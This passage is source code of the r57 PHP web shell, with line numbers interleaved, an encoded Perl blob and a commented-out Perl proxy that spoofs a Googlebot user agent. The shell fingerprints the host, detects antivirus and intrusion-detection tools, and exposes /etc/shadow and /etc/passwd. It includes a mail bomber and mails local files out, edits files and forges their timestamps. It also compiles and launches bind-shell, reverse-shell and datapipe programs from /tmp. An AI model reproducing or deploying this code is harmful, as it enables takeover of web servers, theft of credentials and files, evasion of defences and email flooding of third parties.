9wZW5fY29ubmVjdGlvbiB7Cm15ICgkaG9zdCwgJHBvcnQpID0gQF9bMSwyXTsKbXkgKCRkZXN0X2FkZHIsICRjdXIpOwppZiAoJHBvcnQgIX4gL15cZ

3933
3934
CskLykgewokcG9ydCA9IChnZXRzZXJ2YnluYW1lKCRwb3J0LCAidGNwIikpWzJdOwokcG9ydCA9IDgwIHVubGVzcyAoJHBvcnQpOwp9CiRob3N0ID0g

3935
3936
aW5ldF9hdG9uICgkaG9zdCkgb3IgcmV0dXJuIDA7CiRkZXN0X2FkZHIgPSBzb2NrYWRkcl9pbiAoJHBvcnQsICRob3N0KTsKc29ja2V0ICgkX1swXSw

3937
3938
gQUZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90b2NvbCkgb3IgZGllICJzb2NrZXQoKSA6ICQhIjsKY29ubmVjdCAoJF9bMF0sICRkZXN0X2FkZHIpIG

3939
3940
9yIHJldHVybiAwOwokY3VyID0gc2VsZWN0KCRfWzBdKTsgIAokfCA9IDE7CnNlbGVjdCgkY3VyKTsKcmV0dXJuIDE7Cn0=";

3941
3942
3943
3944
/* ?ST SATIRIN KIRILMI? HAL? */

3945
3946
/*

3947
3948
3949
3950
#!usr/bin/perl

3951
3952
use Socket;

3953
3954
my $port = $ARGV[0]||31337;

3955
3956
my $protocol = getprotobyname('tcp');

3957
3958
my $my_addr  = sockaddr_in ($port, INADDR_ANY);

3959
3960
socket (SOCK, AF_INET, SOCK_STREAM, $protocol) or die "socket(): $!";

3961
3962
setsockopt (SOCK, SOL_SOCKET, SO_REUSEADDR,1 ) or die "setsockopt(): $!";

3963
3964
bind (SOCK, $my_addr) or die "bind(): $!";

3965
3966
listen (SOCK, SOMAXCONN) or die "listen(): $!";

3967
3968
$SIG{'INT'} = sub {

3969
3970
close (SOCK);

3971
3972
exit;

3973
3974
};

3975
3976
while (1) {

3977
3978
next unless my $remote_addr = accept (SESSION, SOCK);

3979
3980
my ($fist, $method, $remote_host, $remote_port) = analyze_request();

3981
3982
if(open_connection (REMOTE, $remote_host, $remote_port) == 0) {

3983
3984
close (SESSION);

3985
3986
next;

3987
3988
}

3989
3990
print REMOTE $first;

3991
3992
print REMOTE "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n";

3993
3994
while (<SESSION>) {

3995
3996
next if (/Proxy-Connection:/ || /User-Agent:/);

3997
3998
print REMOTE $_;

3999
4000
last if ($_ =~ /^[\s\x00]*$/);

4001
4002
}

4003
4004
print REMOTE "\n";

4005
4006
$header = 1;

4007
4008
while (<REMOTE>) {

4009
4010
print SESSION $_;

4011
4012
if ($header) {     

4013
4014
if ($header && $_ =~ /^[\s\x00]*$/) {

4015
4016
$header = 0;

4017
4018
}

4019
4020
}

4021
4022
}

4023
4024
close (REMOTE);

4025
4026
close (SESSION);

4027
4028
}

4029
4030
close (SOCK);

4031
4032
sub analyze_request {

4033
4034
my ($fist, $url, $remote_host, $remote_port, $method);

4035
4036
$first = <SESSION>;

4037
4038
$url = ($first =~ m|(http://\S+)|)[0];

4039
4040
($method, $remote_host, $remote_port) = 

4041
4042
($first =~ m!(GET) http://([^/:]+):?(\d*)! );

4043
4044
if (!$remote_host) {

4045
4046
close(SESSION);

4047
4048
exit;

4049
4050
}

4051
4052
$remote_port = "http" unless ($remote_port);

4053
4054
$first =~ s/http:\/\/[^\/]+//;

4055
4056
return ($first, $method, $remote_host, $remote_port);

4057
4058
}

4059
4060
sub open_connection {

4061
4062
my ($host, $port) = @_[1,2];

4063
4064
my ($dest_addr, $cur);

4065
4066
if ($port !~ /^\d+$/) {

4067
4068
$port = (getservbyname($port, "tcp"))[2];

4069
4070
$port = 80 unless ($port);

4071
4072
}

4073
4074
$host = inet_aton ($host) or return 0;

4075
4076
$dest_addr = sockaddr_in ($port, $host);

4077
4078
socket ($_[0], AF_INET, SOCK_STREAM, $protocol) or die "socket() : $!";

4079
4080
connect ($_[0], $dest_addr) or return 0;

4081
4082
$cur = select($_[0]);  

4083
4084
$| = 1;

4085
4086
select($cur);

4087
4088
return 1;

4089
4090
}

4091
4092
4093
4094
*/

4095
4096
4097
4098
4099
4100
if($unix)

4101
4102
{

4103
4104
if(!isset($_COOKIE['uname'])) {$uname = ex('uname -a');setcookie('uname',$uname);}else {$uname = $_COOKIE['uname'];}

4105
4106
if(!isset($_COOKIE['id'])) {$id = ex('id');setcookie('id',$id);}else {$id = $_COOKIE['id'];}

4107
4108
if($safe_mode) {$sysctl = '-';}

4109
4110
else if(isset($_COOKIE['sysctl'])) {$sysctl = $_COOKIE['sysctl'];}

4111
4112
else  

4113
4114
{

4115
4116
$sysctl = ex('sysctl -n kern.ostype && sysctl -n kern.osrelease');

4117
4118
if(empty($sysctl)) {$sysctl = ex('sysctl -n kernel.ostype && sysctl -n kernel.osrelease');}

4119
4120
if(empty($sysctl)) {$sysctl = '-';}

4121
4122
setcookie('sysctl',$sysctl);

4123
4124
}

4125
4126
}

4127
4128
echo $head;

4129
4130
echo '</head>';

4131
4132
echo '<body><table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000><tr><td bgcolor=#333333 width=160><font face=Verdana size=2>'.ws(2).'<font face=tahoma size=2><b>r57 shell '.$version.'</b></font></td><td bgcolor=#333333><font face=Verdana size=-2>';

4133
4134
echo ws(2)."<b>".date ("d-m-Y H:i:s")."</b> Your IP: [<font color=blue>".gethostbyname($_SERVER["REMOTE_ADDR"])."</font>]";

4135
4136
if(isset($_SERVER['X_FORWARDED_FOR'])){echo " X_FORWARDED_FOR: [<font color=red>".$_SERVER['X_FORWARDED_FOR']."</font>]";}

4137
4138
if(isset($_SERVER['CLIENT_IP'])){echo " CLIENT_IP: [<font color=red>".$_SERVER['CLIENT_IP']."</font>]";}

4139
4140
echo " Server IP: [<a href=".gethostbyname($_SERVER["HTTP_HOST"])." target=iframe><font color=blue>".gethostbyname($_SERVER["HTTP_HOST"])."</font></a>]";

4141
4142
echo "<br>";

4143
4144
echo ws(2)."PHP version: <b>".@phpversion()."</b>";

4145
4146
$curl_on = @function_exists('curl_version');

4147
4148
echo ws(2);

4149
4150
echo "cURL: <b>".(($curl_on)?("<font color=green>ON</font>"):("<font color=red>Kapali</font>"));

4151
4152
echo "</b>".ws(2);

4153
4154
echo "MySQL: <b>";

4155
4156
$mysql_on = @function_exists('mysql_connect');

4157
4158
if($mysql_on){

4159
4160
echo "<font color=green>ON</font>";}else {echo "<font color=red>Kapali</font>";}

4161
4162
echo "</b>".ws(2);

4163
4164
echo "MSSQL: <b>";

4165
4166
$mssql_on = @function_exists('mssql_connect');

4167
4168
if($mssql_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>Kapali</font>";}

4169
4170
echo "</b>".ws(2);

4171
4172
echo "PostgreSQL: <b>";

4173
4174
$pg_on = @function_exists('pg_connect');

4175
4176
if($pg_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>Kapali</font>";}

4177
4178
echo "</b>".ws(2);

4179
4180
echo "Oracle: <b>";

4181
4182
$ora_on = @function_exists('ocilogon');

4183
4184
if($ora_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>Kapali</font>";}

4185
4186
echo "</b><br>".ws(2);

4187
4188
echo "Safe_mode: <b>";

4189
4190
echo (($safe_mode)?("<font color=green>ON</font>"):("<font color=red>Kapali</font>"));

4191
4192
echo "</b>".ws(2);

4193
4194
echo "Open_basedir: <b>";

4195
4196
if($open_basedir) {if (''==($df=@ini_get('open_basedir'))) {echo "<font color=red>ini_get disable!</font></b>";}else {echo "<font color=green>$df</font></b>";};}

4197
4198
else {echo "<font color=red>NONE</font></b>";}

4199
4200
echo ws(2)."Safe_mode_exec_dir: <b>";

4201
4202
if(@function_exists('ini_get')) {if (''==($df=@ini_get('safe_mode_exec_dir'))) {echo "<font color=red>NONE</font></b>";}else {echo "<font color=green>$df</font></b>";};}

4203
4204
else {echo "<font color=red>ini_get disable!</font></b>";}

4205
4206
echo ws(2)."Safe_mode_include_dir: <b>";

4207
4208
if(@function_exists('ini_get')) {if (''==($df=@ini_get('safe_mode_include_dir'))) {echo "<font color=red>NONE</font></b>";}else {echo "<font color=green>$df</font></b>";};}

4209
4210
else {echo "<font color=red>ini_get disable!</font></b>";}

4211
4212
echo "<br>".ws(2);

4213
4214
echo "Disable functions : <b>";$df='ini_get  disable!';

4215
4216
if((@function_exists('ini_get')) &&(''==($df=@ini_get('disable_functions')))){echo "<font color=red>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}

4217
4218
$free = @diskfreespace($dir);

4219
4220
if (!$free) {$free = 0;}

4221
4222
$all = @disk_total_space($dir);

4223
4224
if (!$all) {$all = 0;}

4225
4226
echo "<br>".ws(2)."Free space : <b>".view_size($free)."</b> Total space: <b>".view_size($all)."</b>";

4227
4228
$ust='';

4229
4230
if($unix &&!$safe_mode){

4231
4232
if (which('gcc')) {$ust.="gcc,";}

4233
4234
if (which('cc')) {$ust.="cc,";}

4235
4236
if (which('ld')) {$ust.="ld,";}

4237
4238
if (which('php')) {$ust.="php,";}

4239
4240
if (which('perl')) {$ust.="perl,";}

4241
4242
if (which('python')) {$ust.="python,";}

4243
4244
if (which('ruby')) {$ust.="ruby,";}

4245
4246
if (which('make')) {$ust.="make,";}

4247
4248
if (which('tar')) {$ust.="tar,";}

4249
4250
if (which('nc')) {$ust.="netcat,";}

4251
4252
if (which('locate')) {$ust.="locate,";}

4253
4254
if (which('suidperl')) {$ust.="suidperl,";}

4255
4256
}

4257
4258
if (@function_exists('pcntl_exec')) {$ust.="pcntl_exec,";}

4259
4260
if($ust){echo "<br>".ws(2).$lang[$language.'_text137'].": <font color=blue>".$ust."</font>";}

4261
4262
$ust='';

4263
4264
if($unix &&!$safe_mode){

4265
4266
if (which('kav')) {$ust.="kav,";}

4267
4268
if (which('nod32')) {$ust.="nod32,";}

4269
4270
if (which('bdcored')) {$ust.="bitdefender,";}

4271
4272
if (which('uvscan')) {$ust.="mcafee,";}

4273
4274
if (which('sav')) {$ust.="symantec,";}

4275
4276
if (which('drwebd')) {$ust="drwebd,";}

4277
4278
if (which('clamd')) {$ust.="clamd,";}

4279
4280
if (which('rkhunter')) {$ust.="rkhunter,";}

4281
4282
if (which('chkrootkit')) {$ust.="chkrootkit,";}

4283
4284
if (which('iptables')) {$ust.="iptables,";}

4285
4286
if (which('ipfw')) {$ust.="ipfw,";}

4287
4288
if (which('tripwire')) {$ust.="tripwire,";}

4289
4290
if (which('shieldcc')) {$ust.="stackshield,";}

4291
4292
if (which('portsentry')) {$ust.="portsentry,";}

4293
4294
if (which('snort')) {$ust.="snort,";}

4295
4296
if (which('ossec')) {$ust.="ossec,";}

4297
4298
if (which('lidsadm')) {$ust.="lidsadm,";}

4299
4300
if (which('tcplodg')) {$ust.="tcplodg,";}

4301
4302
if (which('tripwire')) {$ust.="tripwire,";}

4303
4304
if (which('sxid')) {$ust.="sxid,";}

4305
4306
if (which('logcheck')) {$ust.="logcheck,";}

4307
4308
if (which('logwatch')) {$ust.="logwatch,";}

4309
4310
}

4311
4312
if (@function_exists('apache_get_modules') &&@in_array('mod_security',apache_get_modules())) {$ust.="mod_security,";}

4313
4314
if($ust){echo "<br>".ws(2).$lang[$language.'_text138'].": <font color=red>$ust</font>";}

4315
4316
echo "<br>".ws(2)."</b>";

4317
4318
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb;

4319
4320
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb;

4321
4322
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb;

4323
4324
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb;

4325
4326
if(!$unix) {

4327
4328
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?systeminfo title=\"".$lang[$language.'_text50']."\"><b>systeminfo</b></a> ".$rb;

4329
4330
}else{

4331
4332
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?syslog title=\"View syslog.conf\"><b>syslog</b></a> ".$rb;

4333
4334
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?resolv title=\"View resolv\"><b>resolv</b></a> ".$rb;

4335
4336
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?hosts title=\"View hosts\"><b>hosts</b></a> ".$rb;

4337
4338
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?shadow title=\"View shadow\"><b>shadow</b></a> ".$rb;

4339
4340
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?passwd title=\"".$lang[$language.'_text95']."\"><b>passwd</b></a> ".$rb;

4341
4342
}

4343
4344
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb;

4345
4346
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb;

4347
4348
if($unix &&!$safe_mode) 

4349
4350
{

4351
4352
echo "<br>".ws(2)."</b>";

4353
4354
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?procinfo title=\"View procinfo\"><b>procinfo</b></a> ".$rb;

4355
4356
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?version title=\"View proc version\"><b>version</b></a> ".$rb;

4357
4358
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?free title=\"View mem free\"><b>free</b></a> ".$rb;

4359
4360
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?dmesg(8) title=\"View dmesg\"><b>dmesg</b></a> ".$rb;

4361
4362
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?vmstat title=\"View vmstat\"><b>vmstat</b></a> ".$rb;

4363
4364
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?lspci title=\"View lspci\"><b>lspci</b></a> ".$rb;

4365
4366
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?lsdev title=\"View lsdev\"><b>lsdev</b></a> ".$rb;

4367
4368
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?interrupts title=\"View interrupts\"><b>interrupts</b></a> ".$rb;

4369
4370
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?realise1 title=\"View realise1\"><b>realise1</b></a> ".$rb;

4371
4372
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?realise2 title=\"View realise2\"><b>realise2</b></a> ".$rb;

4373
4374
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?lsattr title=\"View lsattr -va\"><b>lsattr</b></a> ".$rb;

4375
4376
echo "<br>".ws(2)."</b>";

4377
4378
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?w title=\"View w\"><b>w</b></a> ".$rb;

4379
4380
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?who title=\"View who\"><b>who</b></a> ".$rb;

4381
4382
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?uptime title=\"View uptime\"><b>uptime</b></a> ".$rb;

4383
4384
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?last title=\"View last -n 10\"><b>last</b></a> ".$rb;

4385
4386
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?psaux title=\"View ps -aux\"><b>ps aux</b></a> ".$rb;

4387
4388
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?service title=\"View service\"><b>service</b></a> ".$rb;

4389
4390
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?ifconfig title=\"View ifconfig\"><b>ifconfig</b></a> ".$rb;

4391
4392
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?netstat title=\"View netstat -a\"><b>netstat</b></a> ".$rb;

4393
4394
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?fstab title=\"View fstab\"><b>fstab</b></a> ".$rb;

4395
4396
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?fdisk title=\"View fdisk -l\"><b>fdisk</b></a> ".$rb;

4397
4398
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?df title=\"View df -h\"><b>df -h</b></a> ".$rb;

4399
4400
}

4401
4402
echo '</font></td></tr><table>

4403
4404
<table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000>

4405
4406
<tr><td align=right width=100>';

4407
4408
echo $font;

4409
4410
if($unix){

4411
4412
echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';

4413
4414
echo "</td><td>";

4415
4416
echo "<font face=Verdana size=-2 color=red><b>";

4417
4418
echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));

4419
4420
echo ws(3).$sysctl."<br>";

4421
4422
echo ws(3).ex('echo $OSTYPE')."<br>";

4423
4424
echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";

4425
4426
if(!empty($id)) {echo ws(3).$id."<br>";}

4427
4428
else if(@function_exists('posix_geteuid') &&@function_exists('posix_getegid') &&@function_exists('posix_getgrgid') &&@function_exists('posix_getpwuid'))

4429
4430
{

4431
4432
$euserinfo  = @posix_getpwuid(@posix_geteuid());

4433
4434
$egroupinfo = @posix_getgrgid(@posix_getegid());

4435
4436
echo ws(3).'uid='.$euserinfo['uid'].' ( '.$euserinfo['name'].' ) gid='.$egroupinfo['gid'].' ( '.$egroupinfo['name'].' )<br>';

4437
4438
}

4439
4440
else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>";

4441
4442
echo ws(3).$dir;

4443
4444
echo ws(3).'( '.perms(@fileperms($dir)).' )';

4445
4446
echo "</b></font>";

4447
4448
}

4449
4450
else

4451
4452
{

4453
4454
echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';

4455
4456
echo "</td><td>";

4457
4458
echo "<font face=Verdana size=-2 color=red><b>";

4459
4460
echo ws(3).@substr(@php_uname(),0,120)."<br>";

4461
4462
echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";

4463
4464
echo ws(3).@getenv("USERNAME")."<br>";

4465
4466
echo ws(3).$dir;

4467
4468
echo "<br></font>";

4469
4470
}

4471
4472
echo "</font>";

4473
4474
echo "</td></tr></table>";

4475
4476
if(!empty($_POST['cmd']) &&$_POST['cmd']=="mail")

4477
4478
{

4479
4480
$res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$_POST['from']."\r\n");

4481
4482
err(6+$res);

4483
4484
$_POST['cmd']="";

4485
4486
}

4487
4488
if(!empty($_POST['cmd']) &&$_POST['cmd']=="mail_file"&&!empty($_POST['loc_file']))

4489
4490
{

4491
4492
if($file=@fopen($_POST['loc_file'],"r")){$filedump = @fread($file,@filesize($_POST['loc_file']));@fclose($file);}

4493
4494
else if ($file=readzlib($_POST['loc_file'])) {$filedump = $file;}else {err(1,$_POST['loc_file']);$_POST['cmd']="";}

4495
4496
if(isset($_POST['cmd'])) 

4497
4498
{

4499
4500
$filename = @basename($_POST['loc_file']);

4501
4502
$content_encoding=$mime_type='';

4503
4504
compress($filename,$filedump,$_POST['compress']);

4505
4506
$attach = array(

4507
4508
"name"=>$filename,

4509
4510
"type"=>$mime_type,

4511
4512
"content"=>$filedump

4513
4514
);

4515
4516
if(empty($_POST['subj'])) {$_POST['subj'] = 'file from r57';}

4517
4518
if(empty($_POST['from'])) {$_POST['from'] = 'billy@microsoft.com';}

4519
4520
$res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach);

4521
4522
err(6+$res);

4523
4524
$_POST['cmd']="";

4525
4526
}

4527
4528
}

4529
4530
if(!empty($_POST['cmd']) &&$_POST['cmd']=="mail_bomber"&&!empty($_POST['mail_flood']) &&!empty($_POST['mail_size']))

4531
4532
{

4533
4534
for($h=1;$h<=$_POST['mail_flood'];$h++){

4535
4536
$res = mail($_POST['to'],$_POST['subj'],$_POST['text'].str_repeat(" ",1024*$_POST['mail_size']),"From: ".$_POST['from']."\r\n");

4537
4538
}

4539
4540
err(6+$res);

4541
4542
$_POST['cmd']="";

4543
4544
}

4545
4546
if(!empty($_POST['cmd']) &&$_POST['cmd'] == "find_text")

4547
4548
{

4549
4550
$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';

4551
4552
}

4553
4554
if(!empty($_POST['cmd']) &&$_POST['cmd']=="ch_")

4555
4556
{

4557
4558
switch($_POST['what'])

4559
4560
{

4561
4562
case 'own':

4563
4564
@chown($_POST['param1'],$_POST['param2']);

4565
4566
break;

4567
4568
case 'grp':

4569
4570
@chgrp($_POST['param1'],$_POST['param2']);

4571
4572
break;

4573
4574
case 'mod':

4575
4576
@chmod($_POST['param1'],intval($_POST['param2'],8));

4577
4578
break;

4579
4580
}

4581
4582
$_POST['cmd']="";

4583
4584
}

4585
4586
if(!empty($_POST['cmd']) &&$_POST['cmd']=="mk")

4587
4588
{

4589
4590
switch($_POST['what'])

4591
4592
{

4593
4594
case 'file':

4595
4596
if($_POST['action'] == "create")

4597
4598
{

4599
4600
if(@file_exists($_POST['mk_name']) ||!$file=@fopen($_POST['mk_name'],"w")) {err(2,$_POST['mk_name']);$_POST['cmd']="";}

4601
4602
else {

4603
4604
@fclose($file);

4605
4606
$_POST['e_name'] = $_POST['mk_name'];

4607
4608
$_POST['cmd']="edit_file";

4609
4610
echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";

4611
4612
}

4613
4614
}

4615
4616
else if($_POST['action'] == "delete")

4617
4618
{

4619
4620
if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";

4621
4622
$_POST['cmd']="";

4623
4624
}

4625
4626
break;

4627
4628
case 'dir':

4629
4630
if($_POST['action'] == "create"){

4631
4632
if(@mkdir($_POST['mk_name']))

4633
4634
{

4635
4636
$_POST['cmd']="";

4637
4638
echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";

4639
4640
}

4641
4642
else {err(2,$_POST['mk_name']);$_POST['cmd']="";}

4643
4644
}

4645
4646
else if($_POST['action'] == "delete"){

4647
4648
if(@rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";

4649
4650
$_POST['cmd']="";

4651
4652
}

4653
4654
break;

4655
4656
}

4657
4658
}

4659
4660
if(!empty($_POST['cmd']) &&$_POST['cmd']=="touch")

4661
4662
{

4663
4664
if(!$_POST['file_name_r'])

4665
4666
{

4667
4668
$datar = $_POST['day']." ".$_POST['month']." ".$_POST['year']." ".$_POST['chasi']." hours ".$_POST['minutes']." minutes ".$_POST['second']." seconds";

4669
4670
$datar = @strtotime($datar);

4671
4672
@touch($_POST['file_name'],$datar,$datar);}

4673
4674
else{

4675
4676
@touch($_POST['file_name'],@filemtime($_POST['file_name_r']),@filemtime($_POST['file_name_r']));

4677
4678
}

4679
4680
$_POST['cmd']="";

4681
4682
}

4683
4684
if(!empty($_POST['cmd']) &&$_POST['cmd']=="edit_file"&&!empty($_POST['e_name']))

4685
4686
{

4687
4688
if(!$file=@fopen($_POST['e_name'],"r+")) {$filedump = @fread($file,@filesize($_POST['e_name']));@fclose($file);$only_read = 1;}

4689
4690
if($file=@fopen($_POST['e_name'],"r")) {$filedump = @fread($file,@filesize($_POST['e_name']));@fclose($file);}

4691
4692
else if ($file=readzlib($_POST['e_name'])) {$filedump = $file;$only_read = 1;}else {err(1,$_POST['e_name']);$_POST['cmd']="";}

4693
4694
if(isset($_POST['cmd'])) 

4695
4696
{

4697
4698
echo $table_up3;

4699
4700
echo $font;

4701
4702
echo "<form name=save_file method=post>";

4703
4704
echo ws(3)."<b>".$_POST['e_name']."</b>";

4705
4706
echo "<div align=center><textarea name=e_text cols=121 rows=24>";

4707
4708
echo @htmlspecialchars($filedump);

4709
4710
echo "</textarea>";

4711
4712
echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";

4713
4714
echo "<input type=hidden name=dir value=".$dir.">";

4715
4716
echo "<input type=hidden name=cmd value=save_file>";

4717
4718
echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));

4719
4720
echo "</div>";

4721
4722
echo "</font>";

4723
4724
echo "</form>";

4725
4726
echo "</td></tr></table>";

4727
4728
exit();

4729
4730
}

4731
4732
}

4733
4734
if(!empty($_POST['cmd']) &&$_POST['cmd']=="save_file")

4735
4736
{

4737
4738
$mtime = @filemtime($_POST['e_name']);

4739
4740
if((!$file=@fopen($_POST['e_name'],"w")) &&(!function_exists('file_put_contents'))) {err(0,$_POST['e_name']);}

4741
4742
else {

4743
4744
if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']);

4745
4746
@fwrite($file,$_POST['e_text']) or @fputs($file,$_POST['e_text']) or @file_put_contents($_POST['e_name'],$_POST['e_text']);

4747
4748
@touch($_POST['e_name'],$mtime,$mtime);

4749
4750
$_POST['cmd']="";

4751
4752
echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";

4753
4754
}

4755
4756
}

4757
4758
if (!empty($_POST['proxy_port'])&&($_POST['use']=="Perl"))

4759
4760
{

4761
4762
cf("/tmp/prxpl",$prx_pl);

4763
4764
$p2=which("perl");

4765
4766
$blah = ex($p2." /tmp/prxpl ".$_POST['proxy_port']." &");

4767
4768
$_POST['cmd']="ps -aux | grep prxpl";

4769
4770
}

4771
4772
if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))

4773
4774
{

4775
4776
cf("/tmp/bd.c",$port_bind_bd_c);

4777
4778
$blah = ex("gcc -o /tmp/bd /tmp/bd.c");

4779
4780
@unlink("/tmp/bd.c");

4781
4782
$blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");

4783
4784
$_POST['cmd']="ps -aux | grep bd";

4785
4786
}

4787
4788
if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))

4789
4790
{

4791
4792
cf("/tmp/bdpl",$port_bind_bd_pl);

4793
4794
$p2=which("perl");

4795
4796
$blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");

4797
4798
$_POST['cmd']="ps -aux | grep bdpl";

4799
4800
}

4801
4802
if (!empty($_POST['ip']) &&!empty($_POST['port']) &&($_POST['use']=="Perl"))

4803
4804
{

4805
4806
cf("/tmp/back",$back_connect);

4807
4808
$p2=which("perl");

4809
4810
$blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");

4811
4812
$_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";

4813
4814
}

4815
4816
if (!empty($_POST['ip']) &&!empty($_POST['port']) &&($_POST['use']=="C"))

4817
4818
{

4819
4820
cf("/tmp/back.c",$back_connect_c);

4821
4822
$blah = ex("gcc -o /tmp/backc /tmp/back.c");

4823
4824
@unlink("/tmp/back.c");

4825
4826
$blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");

4827
4828
$_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";

4829
4830
}

4831
4832
if (!empty($_POST['local_port']) &&!empty($_POST['remote_host']) &&!empty($_POST['remote_port']) &&($_POST['use']=="Perl"))

4833
4834
{

4835
4836
cf("/tmp/dp",$datapipe_pl);

4837
4838
$p2=which("perl");

4839
4840
$blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &");

4841
4842
$_POST['cmd']="ps -aux | grep dp";

4843
4844
}

4845
4846
if (!empty($_POST['local_port']) &&!empty($_POST['remote_host']) &&!empty($_POST['remote_port']) &&($_POST['use']=="C"))

4847
4848
{

4849
4850
cf("/tmp/dpc.c",$datapipe_c);

4851
4852
$blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");

4853
4854
@unlink("/tmp/dpc.c");

4855
4856
$blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &");

4857
4858
$_POST['cmd']="ps -aux | grep dpc";

4859
4860
}

4861
4862
if (!empty($_POST['alias']) &&isset($aliases[$_POST['alias']])) {$_POST['cmd'] = $aliases[$_POST['alias']];}

4863
4864
for($upl=0;$upl<=16;$upl++)

4865
4866
{

4867
4868
if(!empty($HTTP_POST_FILES['userfile'.$upl]['name'])){

4869
4870
if(!empty($_POST['new_name']) &&($upl==0)) {$nfn = $_POST['new_name'];}

4871
4872
else {$nfn = $HTTP_POST_FILES['userfile'.$upl]['name'];}

4873
4874
